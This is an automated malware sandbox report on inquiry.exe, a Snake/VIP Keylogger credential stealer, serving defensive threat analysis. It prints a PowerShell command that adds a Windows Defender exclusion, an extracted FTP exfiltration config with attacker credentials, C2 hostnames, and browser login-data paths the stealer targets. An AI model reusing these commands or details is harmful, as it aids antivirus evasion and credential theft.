Edit tour

Windows Analysis Report
inquiry.exe

Overview

General Information

Sample name:	inquiry.exe
Analysis ID:	1518503
MD5:	e645b187588a20e886416884000446db
SHA1:	1197c4cb571201164af8e2f98f787be189c9aa63
SHA256:	32bb184d40c1cd31619acef73c72cff265023617438eedc0890da62b50f6ff98
Tags:	exeuser-threatcat_ch
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected AntiVM3

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected UAC Bypass using CMSTP

Yara detected VIP Keylogger

.NET source code references suspicious native API functions

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

Disables UAC (registry)

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for sample

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Silenttrinity Stager Msbuild Activity

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Yara detected Generic Downloader

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file does not import any functions

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Suricata IDS alerts with low severity for network traffic

Uses FTP

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

inquiry.exe (PID: 7340 cmdline: "C:\Users\user\Desktop\inquiry.exe" MD5: E645B187588A20E886416884000446DB)

powershell.exe (PID: 7812 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\inquiry.exe" -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 2712 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

MSBuild.exe (PID: 7860 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

MSBuild.exe (PID: 7880 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

WerFault.exe (PID: 8052 cmdline: C:\Windows\system32\WerFault.exe -u -p 7340 -s 1312 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "FTP", "Username": "august@fastestpay.digital", "Password": "1Qj;XlmD!Lrj", "FTP Server": "ftp://ftp.fastestpay.digital/"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.1511673057.000001F800340000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000A.00000002.3761177777.0000000002B23000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000A.00000002.3758812788.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.3758812788.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000A.00000002.3758812788.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000A.00000002.3758812788.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dd18:$a1: get_encryptedPassword 0x2e035:$a2: get_encryptedUsername 0x2db28:$a3: get_timePasswordChanged 0x2dc31:$a4: get_passwordField 0x2dd2e:$a5: set_encryptedPassword 0x2f3b0:$a7: get_logins 0x2f313:$a10: KeyLoggerEventArgs 0x2ef78:$a11: KeyLoggerEventArgsEventHandler
00000002.00000002.1512122215.000001F810011000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.3761177777.0000000002931000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000002.00000002.1512122215.000001F810011000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000002.00000002.1512122215.000001F810011000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000002.00000002.1512122215.000001F810011000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x723d8:$a1: get_encryptedPassword 0x157258:$a1: get_encryptedPassword 0x726f5:$a2: get_encryptedUsername 0x157575:$a2: get_encryptedUsername 0x721e8:$a3: get_timePasswordChanged 0x157068:$a3: get_timePasswordChanged 0x722f1:$a4: get_passwordField 0x157171:$a4: get_passwordField 0x723ee:$a5: set_encryptedPassword 0x15726e:$a5: set_encryptedPassword 0x73a70:$a7: get_logins 0x1588f0:$a7: get_logins 0x739d3:$a10: KeyLoggerEventArgs 0x158853:$a10: KeyLoggerEventArgs 0x73638:$a11: KeyLoggerEventArgsEventHandler 0x1584b8:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: inquiry.exe PID: 7340	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: inquiry.exe PID: 7340	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: inquiry.exe PID: 7340	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: inquiry.exe PID: 7340	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: inquiry.exe PID: 7340	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: inquiry.exe PID: 7340	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x118f9:$a1: get_encryptedPassword 0x11c0c:$a2: get_encryptedUsername 0x11713:$a3: get_timePasswordChanged 0x1181c:$a4: get_passwordField 0x1190f:$a5: set_encryptedPassword 0x13dc0:$a7: get_logins 0x13d23:$a10: KeyLoggerEventArgs 0x1398c:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: MSBuild.exe PID: 7860	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: MSBuild.exe PID: 7860	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: MSBuild.exe PID: 7860	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: MSBuild.exe PID: 7860	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x65509:$a1: get_encryptedPassword 0x6581c:$a2: get_encryptedUsername 0x65323:$a3: get_timePasswordChanged 0x6542c:$a4: get_passwordField 0x6551f:$a5: set_encryptedPassword 0x679d0:$a7: get_logins 0x67933:$a10: KeyLoggerEventArgs 0x6759c:$a11: KeyLoggerEventArgsEventHandler
Click to see the 16 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
10.2.MSBuild.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.MSBuild.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
10.2.MSBuild.exe.400000.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.2.MSBuild.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.2.MSBuild.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2df18:$a1: get_encryptedPassword 0x2e235:$a2: get_encryptedUsername 0x2dd28:$a3: get_timePasswordChanged 0x2de31:$a4: get_passwordField 0x2df2e:$a5: set_encryptedPassword 0x2f5b0:$a7: get_logins 0x2f513:$a10: KeyLoggerEventArgs 0x2f178:$a11: KeyLoggerEventArgsEventHandler
10.2.MSBuild.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3bdae:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b451:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b6ae:$a4: \Orbitum\User Data\Default\Login Data 0x3c08d:$a5: \Kometa\User Data\Default\Login Data
10.2.MSBuild.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2eb2e:$s1: UnHook 0x2eb35:$s2: SetHook 0x2eb3d:$s3: CallNextHook 0x2eb4a:$s4: _hook
2.2.inquiry.exe.1f81013a340.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.inquiry.exe.1f81013a340.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
2.2.inquiry.exe.1f81013a340.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.inquiry.exe.1f81013a340.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.inquiry.exe.1f81013a340.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2df18:$a1: get_encryptedPassword 0x2e235:$a2: get_encryptedUsername 0x2dd28:$a3: get_timePasswordChanged 0x2de31:$a4: get_passwordField 0x2df2e:$a5: set_encryptedPassword 0x2f5b0:$a7: get_logins 0x2f513:$a10: KeyLoggerEventArgs 0x2f178:$a11: KeyLoggerEventArgsEventHandler
2.2.inquiry.exe.1f81013a340.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3bdae:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b451:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b6ae:$a4: \Orbitum\User Data\Default\Login Data 0x3c08d:$a5: \Kometa\User Data\Default\Login Data
2.2.inquiry.exe.1f81013a340.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2eb2e:$s1: UnHook 0x2eb35:$s2: SetHook 0x2eb3d:$s3: CallNextHook 0x2eb4a:$s4: _hook
2.2.inquiry.exe.1f8100a1f08.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.inquiry.exe.1f8100a1f08.0.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.inquiry.exe.1f8100a1f08.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.inquiry.exe.1f8100a1f08.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xc6350:$a1: get_encryptedPassword 0xc666d:$a2: get_encryptedUsername 0xc6160:$a3: get_timePasswordChanged 0xc6269:$a4: get_passwordField 0xc6366:$a5: set_encryptedPassword 0xc79e8:$a7: get_logins 0xc794b:$a10: KeyLoggerEventArgs 0xc75b0:$a11: KeyLoggerEventArgsEventHandler
2.2.inquiry.exe.1f8100a1f08.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0xd41e6:$a2: \Comodo\Dragon\User Data\Default\Login Data 0xd3889:$a3: \Google\Chrome\User Data\Default\Login Data 0xd3ae6:$a4: \Orbitum\User Data\Default\Login Data 0xd44c5:$a5: \Kometa\User Data\Default\Login Data
2.2.inquiry.exe.1f8100a1f08.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0xc6f66:$s1: UnHook 0xc6f6d:$s2: SetHook 0xc6f75:$s3: CallNextHook 0xc6f82:$s4: _hook
2.2.inquiry.exe.1f8100554c0.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.inquiry.exe.1f8100554c0.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.inquiry.exe.1f8100554c0.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.inquiry.exe.1f8100554c0.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2c118:$a1: get_encryptedPassword 0x2c435:$a2: get_encryptedUsername 0x2bf28:$a3: get_timePasswordChanged 0x2c031:$a4: get_passwordField 0x2c12e:$a5: set_encryptedPassword 0x2d7b0:$a7: get_logins 0x2d713:$a10: KeyLoggerEventArgs 0x2d378:$a11: KeyLoggerEventArgsEventHandler
2.2.inquiry.exe.1f8100554c0.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x39fae:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x39651:$a3: \Google\Chrome\User Data\Default\Login Data 0x398ae:$a4: \Orbitum\User Data\Default\Login Data 0x3a28d:$a5: \Kometa\User Data\Default\Login Data
2.2.inquiry.exe.1f8100554c0.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2cd2e:$s1: UnHook 0x2cd35:$s2: SetHook 0x2cd3d:$s3: CallNextHook 0x2cd4a:$s4: _hook
2.2.inquiry.exe.1f81013a340.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.inquiry.exe.1f81013a340.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.inquiry.exe.1f81013a340.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.inquiry.exe.1f81013a340.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2c118:$a1: get_encryptedPassword 0x2c435:$a2: get_encryptedUsername 0x2bf28:$a3: get_timePasswordChanged 0x2c031:$a4: get_passwordField 0x2c12e:$a5: set_encryptedPassword 0x2d7b0:$a7: get_logins 0x2d713:$a10: KeyLoggerEventArgs 0x2d378:$a11: KeyLoggerEventArgsEventHandler
2.2.inquiry.exe.1f81013a340.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x39fae:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x39651:$a3: \Google\Chrome\User Data\Default\Login Data 0x398ae:$a4: \Orbitum\User Data\Default\Login Data 0x3a28d:$a5: \Kometa\User Data\Default\Login Data
2.2.inquiry.exe.1f81013a340.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2cd2e:$s1: UnHook 0x2cd35:$s2: SetHook 0x2cd3d:$s3: CallNextHook 0x2cd4a:$s4: _hook
2.2.inquiry.exe.1f8100554c0.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.inquiry.exe.1f8100554c0.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
2.2.inquiry.exe.1f8100554c0.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.inquiry.exe.1f8100554c0.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.inquiry.exe.1f8100554c0.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2df18:$a1: get_encryptedPassword 0x112d98:$a1: get_encryptedPassword 0x2e235:$a2: get_encryptedUsername 0x1130b5:$a2: get_encryptedUsername 0x2dd28:$a3: get_timePasswordChanged 0x112ba8:$a3: get_timePasswordChanged 0x2de31:$a4: get_passwordField 0x112cb1:$a4: get_passwordField 0x2df2e:$a5: set_encryptedPassword 0x112dae:$a5: set_encryptedPassword 0x2f5b0:$a7: get_logins 0x114430:$a7: get_logins 0x2f513:$a10: KeyLoggerEventArgs 0x114393:$a10: KeyLoggerEventArgs 0x2f178:$a11: KeyLoggerEventArgsEventHandler 0x113ff8:$a11: KeyLoggerEventArgsEventHandler
2.2.inquiry.exe.1f8100554c0.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2eb2e:$s1: UnHook 0x1139ae:$s1: UnHook 0x2eb35:$s2: SetHook 0x1139b5:$s2: SetHook 0x2eb3d:$s3: CallNextHook 0x1139bd:$s3: CallNextHook 0x2eb4a:$s4: _hook 0x1139ca:$s4: _hook
Click to see the 33 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\inquiry.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\inquiry.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\inquiry.exe", ParentImage: C:\Users\user\Desktop\inquiry.exe, ParentProcessId: 7340, ParentProcessName: inquiry.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\inquiry.exe" -Force, ProcessId: 7812, ProcessName: powershell.exe

Sigma detected: Silenttrinity Stager Msbuild Activity

Source: Network Connection

Author: Kiran kumar s, oscd.community: Data: DestinationIp: 158.101.44.242, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 7860, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49700

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\inquiry.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\inquiry.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\inquiry.exe", ParentImage: C:\Users\user\Desktop\inquiry.exe, ParentProcessId: 7340, ParentProcessName: inquiry.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\inquiry.exe" -Force, ProcessId: 7812, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-25T18:50:28.336191+0200	2803305	3	Unknown Traffic	192.168.2.7	49707	188.114.96.3	443	TCP
2024-09-25T18:50:29.699751+0200	2803305	3	Unknown Traffic	192.168.2.7	49709	188.114.96.3	443	TCP
2024-09-25T18:50:30.954344+0200	2803305	3	Unknown Traffic	192.168.2.7	49711	188.114.96.3	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-25T18:50:26.489574+0200	2803274	2	Potentially Bad Traffic	192.168.2.7	49700	158.101.44.242	80	TCP
2024-09-25T18:50:27.715748+0200	2803274	2	Potentially Bad Traffic	192.168.2.7	49700	158.101.44.242	80	TCP
2024-09-25T18:50:29.129943+0200	2803274	2	Potentially Bad Traffic	192.168.2.7	49708	158.101.44.242	80	TCP
2024-09-25T18:50:30.364603+0200	2803274	2	Potentially Bad Traffic	192.168.2.7	49710	158.101.44.242	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://aborters.duckdns.org:8081	URL Reputation: Label: malware
Source: http://anotherarmy.dns.army:8081	URL Reputation: Label: malware

Found malware configuration

Source: 2.2.inquiry.exe.1f8100554c0.1.unpack

Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "FTP", "Username": "august@fastestpay.digital", "Password": "1Qj;XlmD!Lrj", "FTP Server": "ftp://ftp.fastestpay.digital/"}

Multi AV Scanner detection for submitted file

Source: inquiry.exe

ReversingLabs: Detection: 36%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: inquiry.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 00000002.00000002.1511673057.000001F800340000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: inquiry.exe PID: 7340, type: MEMORYSTR

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49705 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49732 version: TLS 1.2

Source: inquiry.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: System.Windows.Forms.pdb source: WER355F.tmp.dmp.15.dr
Source:	Binary string: Microsoft.VisualBasic.ni.pdb source: WER355F.tmp.dmp.15.dr
Source:	Binary string: mscorlib.pdb source: WER355F.tmp.dmp.15.dr
Source:	Binary string: System.ni.pdbRSDS source: WER355F.tmp.dmp.15.dr
Source:	Binary string: System.Windows.Forms.ni.pdbRSDS source: WER355F.tmp.dmp.15.dr
Source:	Binary string: System.Windows.Forms.ni.pdb source: WER355F.tmp.dmp.15.dr
Source:	Binary string: System.Drawing.pdb source: WER355F.tmp.dmp.15.dr
Source:	Binary string: mscorlib.ni.pdb source: WER355F.tmp.dmp.15.dr
Source:	Binary string: System.Drawing.ni.pdb source: WER355F.tmp.dmp.15.dr
Source:	Binary string: System.Core.pdb source: WER355F.tmp.dmp.15.dr
Source:	Binary string: Microsoft.VisualBasic.pdbmscorlib.dll source: WER355F.tmp.dmp.15.dr
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WER355F.tmp.dmp.15.dr
Source:	Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER355F.tmp.dmp.15.dr
Source:	Binary string: System.Drawing.ni.pdbRSDS source: WER355F.tmp.dmp.15.dr
Source:	Binary string: System.ni.pdb source: WER355F.tmp.dmp.15.dr
Source:	Binary string: System.pdb source: WER355F.tmp.dmp.15.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER355F.tmp.dmp.15.dr
Source:	Binary string: System.Core.ni.pdb source: WER355F.tmp.dmp.15.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WER355F.tmp.dmp.15.dr

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 0103F2EDh	10_2_0103F15F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 0103F2EDh	10_2_0103F33C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 0103FAA9h	10_2_0103F7F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 054C2C21h	10_2_054C2970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 054CF019h	10_2_054CED70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 054CEBC1h	10_2_054CE918
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 054C31E8h	10_2_054C3116
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 054CF471h	10_2_054CF1C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 054C31E8h	10_2_054C2DCA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 054C31E8h	10_2_054C2DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	10_2_054C0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 054CE311h	10_2_054CE068
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 054CDEB9h	10_2_054CDC10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 054CE769h	10_2_054CE4C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 054CD609h	10_2_054CD360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 054CD1B1h	10_2_054CCF08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 054C0D0Dh	10_2_054C0B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 054C1697h	10_2_054C0B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 054CDA61h	10_2_054CD7B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 054CFD21h	10_2_054CFA78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 054CF8C9h	10_2_054CF620

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.inquiry.exe.1f81013a340.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.inquiry.exe.1f8100554c0.1.raw.unpack, type: UNPACKEDPE

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
